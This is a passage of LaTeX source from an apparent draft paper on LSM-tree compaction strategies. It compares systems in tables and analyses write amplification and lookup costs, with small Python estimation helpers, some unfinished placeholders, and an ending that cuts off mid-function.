& \multirow{1.2}{*}{Leveling}
& \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{\cmark}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} &\multirow{1.2}{*}{\cmark}
\\ \midrule
WiredTiger~\cite{WiredTiger}
& {Leveling} & {\cmark} & {}
& {} & {} & {}
& {\cmark} & {} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
X-Engine~\cite{Huang2019}, Leaper~\cite{Yang2020}
& {Hybrid leveling} & {\cmark} & {}
& {} & {} & {}
& {} & {} & {\cmark} & {\cmark}
& {} & {\cmark} & {}
& {} & {} & {\cmark} \\ \midrule
HBase~\cite{ApacheHBase}
& {Tiering} & {} & {\cmark}
& {} & {} & {}
& {} & {\cmark} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
\multirow{2}{*}{AsterixDB~\cite{Alsubaiee2014}}
& \multirow{1}{*}{Leveling} & {\cmark} & {{}}
& {} & {} & {}
& {\cmark} & {} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} &{\cmark} \\ \cline{2-19}
& \multirow{1.2}{*}{Tiering}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark}
\\ \midrule
Tarantool~\cite{Tarantool}
& {$L$-leveling} & {\cmark$^L$} & {\cmark$^T$}
& {} & {} & {}
& {\cmark$^L$} & {\cmark$^T$} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
\multirow{2}{*}{ScyllaDB~\cite{ScyllaDB}}
& \multirow{1}{*}{Tiering} & {} & {\cmark}
& {\cmark} & {} & {\cmark}
& {} & {\cmark} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \cline{2-19}
& \multirow{1.2}{*}{Leveling}
& \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{\cmark}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{\cmark} &\multirow{1.2}{*}{} \\ \midrule
bLSM~\cite{Sears2012}, cLSM~\cite{Golan-Gueta2015}
& {Leveling} & {\cmark} & {}
& {} & {} & {}
& {} & {} & {\cmark} & {}
& {\cmark} & {} & {}
& {} & {} & {} \\ \midrule
Accumulo~\cite{ApacheAccumulo}
& {Tiering} & {\cmark} & {\cmark}
& {} & {} & {\cmark}
& {} & {\cmark} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
LSbM-tree~\cite{Teng2017,Teng2018}
& {Leveling} & {\cmark} & {}
& {} & {} & {}
& {\cmark} & {} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
SifrDB~\cite{Mei2018}
& {Tiering} & {\cmark} & {}
& {} & {} & {}
& {} & {} & {} & {\cmark}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \hline
\bottomrule
\end{tabular}
}
\caption{Compaction strategies in state-of-the-art systems. [\footnotesize{\cmark$^{L}$\normalsize: for levels with leveling; \footnotesize\cmark$^{T}$\normalsize: for levels with tiering.}\normalsize] \label{tab:db}}
\vspace{-0.35in}
\end{table}
\Paragraph{The Compaction Design Space Cardinality}
Two compaction strategies are considered different from each other if they differ in at least one of the four primitives.
Compaction strategies that differ in only one primitive can have vastly different performance when subject to the same workload while running on identical hardware.
Plugging in some typical values for the cardinality of the primitives, we estimate the cardinality of the compaction universe as >$10^4$, a vast yet largely unexplored design space.
Table \ref{tab:db} shows a representative part of this space, detailing the compaction strategies used in more than twenty academic and production systems.
\Paragraph{Compactions Analyzed}
For our analysis and experimentation, we select ten representative compaction strategies that are prevalent in production and academic LSM-based systems.
We codify and present these candidate compaction strategies in Table \ref{tab:comp_list}.
\texttt{Full} represents the compaction strategy for leveled LSM-trees that compacts entire levels upon invocation.
\texttt{LO+1} and \texttt{LO+2} denote two partial compaction routines that choose a file for compaction with the smallest overlap with files in the parent ($i+1$) and grandparent ($i+2$) levels, respectively.
\texttt{RR} chooses files for compaction in a round-robin fashion from each level.
\texttt{Cold} and \texttt{Old} are read-friendly strategies that mark the coldest and oldest file(s) in a level for compaction, respectively.
\texttt{TSD} and \texttt{TSA} are delete-driven compaction strategies with triggers and data movement policies that are determined by the density of tombstones and the age of the oldest tombstone contained in a file, respectively.
\texttt{Tier} represents a variant of tiered data layout, where compactions are triggered when either (a) the number of sorted runs in a level or (b) the estimated space amplification in the tree reaches certain thresholds.
This interpretation of tiering is also referred to as \textit{universal compaction} in systems like RocksDB~\cite{Kryczka2020,RocksDB2020}.
Finally, \texttt{1-Lvl} represents a hybrid data layout where the first disk level is realized as \textit{tiered} while the others as \textit{leveled}.
This is the default data layout for RocksDB~\cite{Kryczka2020,RocksDB2020a}.
\begin{table*}[!ht]
\centering
\resizebox{\textwidth}{!}{%
\begin{tabular}{L{2cm}|C{1.9cm}|C{1.6cm}|C{1.3cm}|C{1.2cm}|C{2.8cm}|C{1.5cm}|C{1.7cm}|C{2.8cm}|C{1.8cm}|C{2.9cm}}
\toprule
\multirow{2}{*}{\textbf{Primitives}} & \textbf{\texttt{Full} \cite{Alsubaiee2014,Teng2017,WiredTiger}} & \textbf{\texttt{LO+1} \cite{FacebookRocksDB,Dayan2018a,Sarkar2020}} & \textbf{\texttt{Cold} \cite{FacebookRocksDB}} & \textbf{\texttt{Old} \cite{FacebookRocksDB}} & \textbf{\texttt{TSD} \cite{FacebookRocksDB,Huang2019}} & \textbf{\texttt{RR} \cite{GoogleLevelDB,HyperLevelDB,Sears2012,Golan-Gueta2015}} & \textbf{\texttt{LO+2} \cite{GoogleLevelDB,HyperLevelDB}} & \textbf{\texttt{TSA} \cite{Sarkar2020}} & \textbf{\texttt{Tier} \cite{Ren2017,ApacheCassandra,HBase2013}} & \textbf{\texttt{1-Lvl} \cite{FacebookRocksDB,Kryczka2020,RocksDB2020a}} \\
\midrule
\multirow{2}{*}{Trigger} & \multirow{2}{*}{level saturation} & \multirow{2}{*}{level sat.} & \multirow{2}{*}{level sat.} & \multirow{2}{*}{level sat.} & \multirow{1}{*}{1. TS-density} & \multirow{2}{*}{level sat.} & \multirow{2}{*}{level sat.} & \multirow{1}{*}{1. TS age} & \multirow{1}{*}{1. \#sorted runs} & \multirow{1}{*}{1. \#sorted runs$^T$} \\
& & & & & 2. level sat. & & & 2. level sat. & \multirow{1}{*}{2. space amp.} & \multirow{1}{*}{2. level sat.$^L$} \\
\midrule
\multirow{1}{*}{Data layout} & leveling & leveling & leveling & leveling & leveling & leveling & leveling & leveling & tiering & hybrid \\
\midrule
\multirow{2}{*}{Granularity} & \multirow{2}{*}{levels} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{sorted runs} & \multirow{1}{*}{1. sorted runs$^T$} \\
& & & & & & & & & & \multirow{1}{*}{2. files$^L$} \\
\midrule
\multirow{1}{*}{Data~movement} & \multirow{2}{*}{N/A} & \multirow{1}{*}{least overlap.} & \multirow{2}{*}{coldest file} & \multirow{2}{*}{oldest file} & \multirow{1}{*}{1. most tombstones} & \multirow{2}{*}{round-robin} & \multirow{1}{*}{least overlap.} & \multirow{1}{*}{1. expired TS-TTL} & \multirow{2}{*}{N/A} & \multirow{1}{*}{1. N/A$^T$} \\
\multirow{1}{*}{policy} & & \multirow{1}{*}{parent} & & & \multirow{1}{*}{2.~least~overlap.~parent} & & \multirow{1}{*}{grandparent} & \multirow{1}{*}{2.~least~overlap.~parent} & & \multirow{1}{*}{2. least overlap. parent$^L$}\\
\bottomrule
\end{tabular}
}
\caption{Compaction strategies evaluated in this work. [\footnotesize{$^{L}$\normalsize: levels with leveling; \footnotesize$^{T}$\normalsize: levels with tiering.}\normalsize]\label{tab:comp_list}}
\vspace{-0.25in}
\end{table*}
\subsection{Write Performance}
The primary objective of compactions is to re-organize the data stored on disk to create fewer longer sorted runs.
However, as data on disk are stored in immutable files, in-place modifications are not supported in LSM-trees.
Each compaction job, thus, takes as input a number of immutable files that are read to memory from disk, and writes back a new set of immutable files to disk after the compaction job is completed.
From the standpoint of a write-optimized data store, this data movement due to compaction is often classified as superfluous; it causes high write amplification, which results in under-utilization of the device bandwidth and leads to poor write throughput~\cite{Raju2017}.
Below, we discuss how the different dimensions of compactions affect the write performance, which is further summarized in Table \ref{tab:perf}.
\subsubsection{\textbf{Write amplification}} We define write amplification as the number of times an entry is (re-)written to disk without any modification during its lifetime (i.e., until it is physically deleted from the disk).
While in an ideal write-optimized store, write amplification should be $1$ (i.e., entries are written in a log), periodic (re-)organization of data in LSM-trees leads to significantly high write amplification~\cite{Raju2017}.
\textit{\blue{Data layout}.} In a leveled LSM-tree, every time a Level $i$ reaches its capacity, all (or a subset of) files from Level $i$ are compacted with all (or the overlapping) files from Level $i+1$; thus, on average each entry is written $T$ times within a level, which leads to an average-case write amplification of $\mathcal{O}(T \cdot L)$.
For a tiered LSM, each level may have up to $T$ sorted runs with overlapping key-ranges; thus, each entry is written at least once per level resulting in an average-case write amplification of $\mathcal{O}(L)$.
An $l$-leveled LSM-tree has its last $l$ levels implemented as leveled with the remaining shallower $L-l$ levels as tiering; and thus, the average-case write amplification in an $l$-leveled tree is given as $\mathcal{O}(L-l) + \mathcal{O}(T \cdot l)$.
Similarly, for a hybrid LSM-tree, the average-case write amplification can be expressed as $\mathcal{O}(L-i) + \mathcal{O}(T \cdot i)$, where $L-i$ denotes the number of tiered levels in the tree.
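Plugging the average-case bounds above into code gives quick proportional estimates (constants dropped, so these are order-of-magnitude comparisons rather than byte-accurate figures):

```python
# Proportional average-case write amplification estimates from the bounds
# derived above; T is the size ratio, L the number of levels, l the number
# of leveled (deepest) levels in an l-leveled tree.

def wa_leveling(T, L):
    return T * L             # O(T . L): each entry rewritten ~T times/level

def wa_tiering(L):
    return L                 # O(L): each entry written about once per level

def wa_l_leveling(T, L, l):
    return (L - l) + T * l   # O(L-l) tiered levels + O(T.l) leveled levels

# Example: T = 10, L = 5 -- leveling rewrites each entry ~10x more
# than tiering, while l-leveling with l = 1 sits in between.
```

These estimates mirror the qualitative ordering observed in our experiments: tiering incurs the least compaction-induced data movement, leveling the most.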
\textit{Compaction trigger.} Compaction triggers that relate to level capacity are the primary trigger in all LSM-trees, and thus, constitute the baseline for our write amplification analysis.
Any additional triggers, such as staleness of a file, expired tombstone-TTLs, space amplification, and read amplification, manifest in more frequent compactions, which leads to higher write amplification.
However, such secondary triggers often optimize for a different performance metric, which may amortize the write amplification over time~\cite{Sarkar2020}.
\textit{Compaction granularity.} Compaction granularity controls the average amount of data movement per compaction job, and is typically driven by the size of the immutable files.
The granularity of compaction does not affect the write amplification, as the total amount of data compacted over time remains the same regardless of the granularity of data movement.
\textit{Data movement policy.} The data movement policy in LSM-based storage engines is typically chosen as to optimize for a set of performance metrics, and thus, plays a crucial role on the overall performance of the engine, including write amplification.
The average write amplification remains $\mathcal{O}(T \cdot L)$ for leveling and $\mathcal{O}(L)$ for tiering when files are chosen for compaction at random or in a round-robin manner once a compaction job is triggered.
However, choosing the file with the least overlap with its parent or grandparent level optimizes for write amplification, and thus reduces the data movement due to compactions.
For compaction strategies that optimize for other performance goals, such as read performance, space amplification, and delete performance, the write amplification is often measured to be higher than that of the average case.
\subsubsection{\textbf{Write Throughput}} The write throughput of an LSM-tree is principally driven by the degree of utilization of the device bandwidth by writes.
The bandwidth utilization, in turn, is affected by (i) any write stalls resulting from the compactions and (ii) the absolute bandwidth support provided by the device.
While the time taken to complete a compaction job influences the frequency and amplitude of the write stalls, the overall data movement due to compaction determines the bandwidth of the device that can be used for writing the ingested data.
Thus, for a given device, write throughput is affected by compactions in the same way as write amplification.
\textit{\blue{Data layout}.} A leveled LSM-tree performs compactions eagerly whenever the memory buffer is full or a disk level reaches a nominal capacity.
This triggers compactions frequently, which consumes the device bandwidth to a greater degree and adversely affects the write throughput.
In contrast, in tiering, compactions are less frequent and with the device bandwidth mostly free of compaction traffic, the write throughput is significantly improved.
\textit{Compaction trigger.} In the presence of secondary compaction triggers (alongside saturation-driven primary triggers), the data movement due to compactions may increase, which leads to reduced write throughput.
However, in most practical cases, the additional data movement caused by secondary compaction triggers amortizes significantly over time, and thus, in the long run, the write throughput remains almost unaffected by their presence.
\textit{Compaction granularity.} Larger compaction granularity results in long-living compaction jobs, which often leads to prolonged write stalls, and thereby, a steep drop in the write throughput for a significant duration, increasing the tail-latency for writes.
Such latency spikes are generally infrequent, but highly prevalent in leveled LSM-trees that compact whole levels at a time~\cite{ONeil1996}, leveled LSM-trees with partial compaction routines that compact several files at a time, and in most tiered LSM-trees~\cite{ApacheCassandra,ApacheHBase}.
A smaller compaction granularity amortizes such latency spikes over time by performing smaller but more frequent compactions throughout the workload execution~\cite{FacebookRocksDB}.
However, it is noteworthy that the overall amount of data movement due to compactions always remains the same regardless of the compaction granularity, and thus, the overall write throughput remains unaffected by the granularity of compactions.
A smaller compaction granularity, however, avoids undesired latency spikes and write stalls, thereby ensuring bounded tail-latency for writes.
\textit{Data movement policy.} Similarly to write amplification, the data movement policy also plays a critical role in the write throughput of a storage engine.
Partial compaction routines that choose the files with minimal overlap with the target level saturate the device bandwidth with compaction traffic the least, and hence have the highest write throughput.
Optimizing for other performance metrics (or none at all), on the other hand, increases the compaction traffic considerably, and thus demonstrates a reduced throughput for writes.
\subsubsection{\textbf{SSD Lifetime}}
\red{We might end up writing a small para on how compactions affect the lifetime of SSDs here.}
\begin{table*}[ht]
\centering
\resizebox{\textwidth}{!}{%
\begin{tabular}{ccl|ccccccc|ccccccc|ccccccc}
\toprule
\MCL{3}{c|}{\MRW{2.5}{\begin{tabular}[c]{@{}c@{}}\textbf{Compaction} \end{tabular}}}
& \MCL{7}{c|}{\textbf{\MRW{1}{\begin{tabular}[c]{@{}c@{}}\textbf{Workload} \end{tabular}}}}
& \MCL{7}{c|}{\textbf{\MRW{1}{\begin{tabular}[c]{@{}c@{}}\textbf{Workload} \end{tabular}}}}
& \MCL{7}{c}{\textbf{\MRW{1}{\begin{tabular}[c]{@{}c@{}}\textbf{Workload} \end{tabular}}}} \\
\MCL{3}{c|}{\MRW{2.5}{\begin{tabular}[c]{@{}c@{}}\textbf{Knob} \end{tabular}}}
& \MCL{7}{c|}{\textbf{A}}
& \MCL{7}{c|}{\textbf{B}}
& \MCL{7}{c}{\textbf{C}} \\ \cline{4-24}
& & & Write & PL & SRQ & LRQ & SA & WA & DPL
& Write & PL & SRQ & LRQ & SA & WA & DPL
& Write & PL & SRQ & LRQ & SA & WA & DPL \\\hline \bottomrule
\MRW{5}{\rotatebox[origin=c]{90}{\textbf{Compaction}}}
& \MCL{1}{c|}{\MRW{5}{\hspace*{-12pt} \rotatebox[origin=c]{90}{\textbf{\blue{Data layout}}}}}
& \MRW{1.5}{Leveling}
& \MRW{1.5}{\Up} & \MRW{1.5}{\Upp} & \MRW{1.5}{\Up} & \MRW{1.5}{\Dww}
& \MRW{1.5}{\Up} & \MRW{1.5}{--} & \MRW{1.5}{\Up}
& \MRW{1.5}{\Dwww} & \MRW{1.5}{\Dwww} & \MRW{1.5}{\Up} & \MRW{1.5}{\Up}
& \MRW{1.5}{\Dw} & \MRW{1.5}{\Dw} & \MRW{1.5}{\Dw}
& \MRW{1.5}{\Dwww} & \MRW{1.5}{\Up} & \MRW{1.5}{\Up} & \MRW{1.5}{\Upp}
& \MRW{1.5}{\Upp} & \MRW{1.5}{\Upp} & \MRW{1.5}{\Upp} \\
& \MCL{1}{c|}{}
& \MRW{2}{Tiering}
& \MRW{2}{\Up} & \MRW{2}{\Upp} & \MRW{2}{\Up} & \MRW{2}{\Dww}
& \MRW{2}{\Up} & \MRW{2}{--} & \MRW{2}{\Up}
& \MRW{2}{\Dwww} & \MRW{2}{\Dwww} & \MRW{2}{\Up} & \MRW{2}{\Up}
& \MRW{2}{\Dw} & \MRW{2}{\Dw} & \MRW{2}{\Dw}
& \MRW{2}{\Dwww} & \MRW{2}{\Up} & \MRW{2}{\Up} & \MRW{2}{\Upp}
& \MRW{2}{\Upp} & \MRW{2}{\Upp} & \MRW{2}{\Upp} \\
& \MCL{1}{c|}{}
& \MRW{2.5}{$l$-leveling}
& \MRW{2.5}{\Up} & \MRW{2.5}{\Upp} & \MRW{2.5}{\Up} & \MRW{2.5}{\Dww}
& \MRW{2.5}{\Up} & \MRW{2.5}{--} & \MRW{2.5}{\Up}
& \MRW{2.5}{\Dwww} & \MRW{2.5}{\Dwww} & \MRW{2.5}{\Up} & \MRW{2.5}{\Up}
& \MRW{2.5}{\Dw} & \MRW{2.5}{\Dw} & \MRW{2.5}{\Dw}
& \MRW{2.5}{\Dwww} & \MRW{2.5}{\Up} & \MRW{2.5}{\Up} & \MRW{2.5}{\Upp}
& \MRW{2.5}{\Upp} & \MRW{2.5}{\Upp} & \MRW{2.5}{\Upp} \\
& \MCL{1}{c|}{}
& \MRW{3}{Hybrid}
& \MRW{3}{\Up} & \MRW{3}{\Upp} & \MRW{3}{\Up} & \MRW{3}{\Dww}
& \MRW{3}{\Up} & \MRW{3}{--} & \MRW{3}{\Up}
& \MRW{3}{\Dwww} & \MRW{3}{\Dwww} & \MRW{3}{\Up} & \MRW{3}{\Up}
& \MRW{3}{\Dw} & \MRW{3}{\Dw} & \MRW{3}{\Dw}
& \MRW{3}{\Dwww} & \MRW{3}{\Up} & \MRW{3}{\Up} & \MRW{3}{\Upp}
& \MRW{3}{\Upp} & \MRW{3}{\Upp} & \MRW{3}{\Upp} \\
& \MCL{1}{c|}{} & & & & & & & & & & & & & & & & \\ \midrule
\MRW{6}{\rotatebox[origin=c]{90}{\textbf{Compaction}}}
& \MCL{1}{c|}{\MRW{6}{\hspace*{-12pt} \rotatebox[origin=c]{90}{\textbf{Trigger}}}}
& \MRW{1.25}{\#Bytes}
& \MRW{1.25}{\GA} & \MRW{1.25}{\GA} & \MRW{1.25}{\GA\GA\GA} & \MRW{1.25}{\RA}
& \MRW{1.25}{\NA} & \MRW{1.25}{\NA} & \MRW{1.25}{\BA}
& \MRW{1.25}{\GA} & \MRW{1.25}{\RA} & \MRW{1.25}{\BA} & \MRW{1.25}{\BA}
& \MRW{1.25}{\GA} & \MRW{1.25}{\GA} & \MRW{1.25}{\GA}
& \MRW{1.25}{\GA} & \MRW{1.25}{\BA} & \MRW{1.25}{\BA} &
& \MRW{1.25}{\GA\GA} & \MRW{1.25}{\GA\GA} & \MRW{1.25}{\GA\GA} \\
& \MCL{1}{c|}{}
& \MRW{1.5}{\#Files}
& \MRW{1.5}{\GA} & \MRW{1.5}{\GA} & \MRW{1.5}{\GA\hspace*{-1pt}\GA\hspace*{-1pt}\GA} & \MRW{1.5}{\RA}
& \MRW{1.5}{\NA} & \MRW{1.5}{\NA} & \MRW{1.5}{\BA}
& \MRW{1.5}{\GA} & \MRW{1.5}{\RA} & \MRW{1.5}{\BA} & \MRW{1.5}{\BA}
& \MRW{1.5}{\GA} & \MRW{1.5}{\GA} & \MRW{1.5}{\GA}
& \MRW{1.5}{\GA} & \MRW{1.5}{\BA} & \MRW{1.5}{\BA} &
& \MRW{1.5}{\GA\GA} & \MRW{1.5}{\GA\GA} & \MRW{1.5}{\GA\GA} \\
& \MCL{1}{c|}{}
& \MRW{1.75}{\#Sorted runs}
& \MRW{1.75}{\GA} & \MRW{1.75}{\GA} & \MRW{1.75}{\GA\GA\GA} & \MRW{1.75}{\RA}
& \MRW{1.75}{\NA} & \MRW{1.75}{\NA} & \MRW{1.75}{\BA}
& \MRW{1.75}{\GA} & \MRW{1.75}{\RA} & \MRW{1.75}{\BA} & \MRW{1.75}{\BA}
& \MRW{1.75}{\GA} & \MRW{1.75}{\GA} & \MRW{1.75}{\GA}
& \MRW{1.75}{\GA} & \MRW{1.75}{\BA} & \MRW{1.75}{\BA} &
& \MRW{1.75}{\GA\GA} & \MRW{1.75}{\GA\GA} & \MRW{1.75}{\GA\GA} \\
& \MCL{1}{c|}{}
& \MRW{2}{Staleness of file}
& \MRW{2}{\GA} & \MRW{2}{\GA} & \MRW{2}{\GA\GA\GA} & \MRW{2}{\RA}
& \MRW{2}{\NA} & \MRW{2}{\NA} & \MRW{2}{\BA}
& \MRW{2}{\GA} & \MRW{2}{\RA} & \MRW{2}{\BA} & \MRW{2}{\BA}
& \MRW{2}{\GA} & \MRW{2}{\GA} & \MRW{2}{\GA}
& \MRW{2}{\GA} & \MRW{2}{\BA} & \MRW{2}{\BA} &
& \MRW{2}{\GA\GA} & \MRW{2}{\GA\GA} & \MRW{2}{\GA\GA} \\
& \MCL{1}{c|}{}
& \MRW{2.25}{Space amp.}
& \MRW{2.25}{\GA} & \MRW{2.25}{\GA} & \MRW{2.25}{\GA\GA\GA} & \MRW{2.25}{\RA}
& \MRW{2.25}{\NA} & \MRW{2.25}{\NA} & \MRW{2.25}{\BA}
& \MRW{2.25}{\GA} & \MRW{2.25}{\RA} & \MRW{2.25}{\BA} & \MRW{2.25}{\BA}
& \MRW{2.25}{\GA} & \MRW{2.25}{\GA} & \MRW{2.25}{\GA}
& \MRW{2.25}{\GA} & \MRW{2.25}{\BA} & \MRW{2.25}{\BA} &
& \MRW{2.25}{\GA\GA} & \MRW{2.25}{\GA\GA} & \MRW{2.25}{\GA\GA} \\ \vspace*{-2pt}
& \MCL{1}{c|}{} & & & & & & & & & & & & & & & & \\ \midrule
\MRW{5}{\rotatebox[origin=c]{90}{\textbf{Compaction}}}
& \MCL{1}{c|}{\MRW{5}{\hspace*{-12pt} \rotatebox[origin=c]{90}{\textbf{Granularity}}}}
& \MRW{1.5}{Level}
& \MRW{4}{\cmark} & \MRW{4}{\cmark} & {}
& \MRW{4}{\small{\ding{109}}} & {} & {}
& {} & \MRW{4}{\cmark} & \MRW{4}{\small{\ding{109}}} & {}
& {} & \MRW{4}{\cmark} & \MRW{4}{\cmark}
& \MRW{4}{\cmark} & \MRW{4}{\cmark} & {} & & & & & \\
& \MCL{1}{c|}{}
& \MRW{2}{File (single)} & \Up & & & & & & & & & & & & & & \\
& \MCL{1}{c|}{}
& \MRW{2.5}{File (multiple)} & & & & & & & & & & & & & & & \\
& \MCL{1}{c|}{}
& \MRW{3}{Sorted run} & {}
& {} & \cmark & \small{\ding{109}} & \cmark & {}
& \cmark & {} & {} & {}
& {} & {} & {} & & & & & \\
& \MCL{1}{c|}{} & & & & & & & & & & & & & & & & \\ \midrule
\MRW{6}{\rotatebox[origin=c]{90}{\textbf{Data Movement}}}
& \MCL{1}{c|}{\MRW{6}{\hspace*{-12pt} \rotatebox[origin=c]{90}{\textbf{Policy}}}}
& \MRW{1}{Round-robin}
& \MRW{4}{\cmark} & \MRW{4}{\cmark} & {}
& \MRW{4}{\small{\ding{109}}} & {} & {}
& {} & \MRW{4}{\cmark} & \MRW{4}{\small{\ding{109}}} & {}
& {} & \MRW{4}{\cmark} & \MRW{4}{\cmark}
& \MRW{4}{\cmark} & \MRW{4}{\cmark} & {} & & & & & \\
& \MCL{1}{c|}{}
& \MRW{1}{Least overlap} & & & & & & & & & & & & & & & \\
& \MCL{1}{c|}{}
& \MRW{1}{Coldest file} & & & & & & & & & & & & & & & \\
& \MCL{1}{c|}{}
& \MRW{1}{Oldest file} & & & & & & & & & & & & & & & \\
& \MCL{1}{c|}{}
& \MRW{1}{File w/ most TS} & {}
& {} & \cmark & \small{\ding{109}} & \cmark & {}
& \cmark & {} & {} & {}
& {} & {} & {} & & & & & \\
& \MCL{1}{c|}{}
& \MRW{1}{Expired TS-TTL} & & & & & & & & & & & & & & & & \\ \midrule
\bottomrule
\end{tabular}
}
\caption{Implications of compaction knobs on performance in LSM-based systems.
\label{tab:perf}}
\vspace{-0.25in}
\end{table*}
\subsection{Read Performance}
The fundamental purpose of re-organizing data on disk through compactions is to facilitate efficient point lookup and range scan operations in LSM-trees.
However, as reads and writes share the same device bandwidth, compactions affect the read performance for mixed workloads that have ingestion and lookups interleaved.
Even for a read-only workload, the position of the data in the tree as well as the number of levels in the tree are affected by the compaction strategy, which in turn affects the point and range lookup performance. Below, we present how the different dimensions of compactions affect the read performance of an LSM-tree.
\subsubsection{\textbf{Point Lookups}} The point lookup performance of an LSM-tree is enhanced at a cost of extra main memory space that is used to store auxiliary data structures, such as Bloom filters and fence pointers.
Bloom filters probabilistically reduce the number of runs to be probed for a point lookup, while fence pointers ensure that we perform only a single I/O per sorted run if the Bloom filter probe returns positive.
Compacting files often pushes the entries in the files to a deeper level, and this may asymptotically increase the cost for lookups.
\textit{\blue{Data layout}.}
The average cost for a point lookup operation on a non-existing key is given as $\mathcal{O}(L \cdot e^{-BPK})$ for leveling and $\mathcal{O}(T \cdot L \cdot e^{-BPK})$ in case of tiering.
A point lookup on an existing key must always perform at least one I/O to fetch the target key, and thus, the average cost is given as $\mathcal{O}(1 + L \cdot e^{-BPK})$ for leveling and $\mathcal{O}(1 + T \cdot L \cdot e^{-BPK})$ for tiering.
For a hybrid design, the average lookup cost for non-existing keys becomes \red{fill in}, and similarly for lookups on existing keys.
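Under the simplified $e^{-BPK}$ false-positive model used above, the expected I/O cost per point lookup can be sketched as follows; the helper is hypothetical and omits caching and per-level filter tuning.

```python
import math

def point_lookup_ios(levels, size_ratio, bpk, layout="leveling", existing=False):
    """Expected I/Os per point lookup, using the paper's simplified
    per-run Bloom false-positive rate of e^{-BPK}."""
    fp = math.exp(-bpk)
    # Leveling has one sorted run per level; tiering has up to T runs per level.
    runs = levels if layout == "leveling" else size_ratio * levels
    base = 1.0 if existing else 0.0  # one mandatory I/O if the key exists
    return base + runs * fp
```

With zero bits per key ($e^{0}=1$) every run is probed, recovering the filter-less costs of $L$ and $T \cdot L$ I/Os.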
\textit{Compaction trigger.} Compaction triggers affect the point lookup performance only marginally. In the presence of secondary triggers, compaction jobs may become more frequent, which consumes a significant proportion of the device bandwidth.
While this affects the point lookup throughput marginally, it constitutes a serious performance bottleneck in scan-heavy workloads, which we discuss in Section~\ref{sec:4.2.2}.
\textit{Compaction granularity.} The granularity of data movement during a compaction job affects the point lookup performance on existing keys to some extent.
For tiered LSMs and leveled LSMs with a full compaction routine, once a Level $i$ reaches a nominal capacity, all entries from that level are compacted and moved to Level $i+1$ (rendering Level $i$ empty).
Compacting all files from a level regardless of the ``hotness'' of the file causes recently and frequently accessed files to move to lower levels of the tree, which is particularly undesirable when the goal is to maximize the read throughput.
In contrast, partial compaction allows for choosing files for compaction while optimizing for read performance.
\textit{Data movement policy.} For partial compaction strategies, the choice of files to compact influences the performance for point lookups on existing keys significantly.
Choosing the ``coldest'' file, i.e., the least recently accessed file, for compaction ensures that the frequently read files are retained in the shallower levels, which reduces the average cost for point lookups.
This improvement becomes more pronounced for lookup-intensive workloads that have a high degree of temporal locality~\cite{Cao2020}, reducing the cost for point lookups on existing keys to $\mathcal{O}(1)$ in leveling and $\mathcal{O}(T)$ for tiering without any assistance from caching.
Compaction strategies that optimize for different performance metrics, such as write amplification, space amplification, or delete performance, however, may choose a ``hot'' file for compaction, which adversely affects the lookup performance.
\subsubsection{\textbf{Range Lookups}} \label{sec:4.2.2}
LSM-trees support range lookups by sort-merging all the qualifying runs (partly or entirely) in memory and then returning the recent-most version of the qualifying entries.
Range lookups benefit from fence pointers in efficiently identifying the first page of qualifying entries in each level, but are not assisted by Bloom filters.
The cost for range lookups depends on the selectivity of the range query and the number of sorted runs in a tree.
Compactions affect the range lookup performance very differently from point lookups.
For our analysis, we distinguish a short range lookup from long range lookup in terms of the number of disk pages per sorted run affected by the range query.
A short range query should not have more than two qualifying pages for each sorted run present in a tree~\cite{Dayan2018}.
\textit{\blue{Data layout}.} \blue{The data layout} controls the number of sorted runs in an LSM-tree, and therefore, influences the cost for range lookups.
The average cost for a long range lookup is given as $\mathcal{O}(\tfrac{s \cdot N}{B})$ for leveling, and that for tiering is $\mathcal{O}(\tfrac{T \cdot s \cdot N}{B})$, where $s$ denotes the selectivity of the range query.
For short range queries, the average cost is simply proportional to the number of sorted runs, and is given as $\mathcal{O}(L)$ for leveling and $\mathcal{O}(T \cdot L)$ for tiering.
For hybrid designs, the cost for range lookups falls between those for leveling and tiering, and depends on the exact design of the tree.
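The two cost regimes above can be captured in a single sketch. The helper below is illustrative: it assumes one I/O per sorted run for short scans and $s \cdot N / B$ pages per run-group for long scans, ignoring fragmentation and caching.

```python
def range_lookup_ios(s, n_entries, page_size, size_ratio, levels,
                     layout="leveling", short=False):
    """Approximate I/Os per range lookup with selectivity s over N entries
    stored B entries per page."""
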